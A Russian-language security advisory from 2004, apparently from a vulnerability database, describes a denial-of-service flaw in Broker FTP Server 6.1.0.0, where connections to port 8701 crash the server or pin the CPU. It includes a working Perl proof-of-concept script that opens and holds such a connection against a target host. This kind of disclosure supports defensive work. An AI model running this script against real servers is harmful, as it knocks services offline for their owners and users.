Отказ в обслуживании против Broker FTP server

Дата публикации:
15.02.2004
Всего просмотров:
1025
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Broker FTP Server 6.1.0.0

Описание: Две уязвимости обнаружены в Broker FTP server. Удаленный пользователь может аварийно завершить работу FTP сервера или заставить систему использовать 100% CPU.

Удаленный пользователь может подключится и затем сразу отключится от Broker FTP server Message Server (8701 порт по умолчанию), чтобы аварийно завершить работу FTP сервера.

Также сообщается, что удаленный пользователь может подключится к message server и не посылая никаких данных оставить подключение открытым, чтобы заставить процесс TsFtpSrv.exe использовать 100% CPU.

Пример/Эксплоит:

#!/usr/bin/perl -w
# TransSoft Broker FTP Server DoS (CPU usage and Exception)
 

use Socket;
if (not $ARGV[0]) {
        print qq~
                Usage: pfdos.pl < host>
        ~;
exit;}

$ip=$ARGV[0];
print "host: " . $ip . "\n\n";
sendexplt("A");
sub sendexplt {
 my ($pstr)=@_;
        $target= inet_aton($ip) || die("inet_aton
problems");
 socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')
||0) ||
 die("Socket problems\n");
 if(connect(S,pack "SnA4x8",2,8701,$target)){
 select(S);
                $|=1;
 print $pstr;
 sleep 100;
         close(S);
 } else { die("Can't connect...\n"); }

URL производителя: http://www.ftp-broker.com/view_content.asp?ID=7

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Broker FTP DoS (Message Server)

или введите имя

CAPTCHA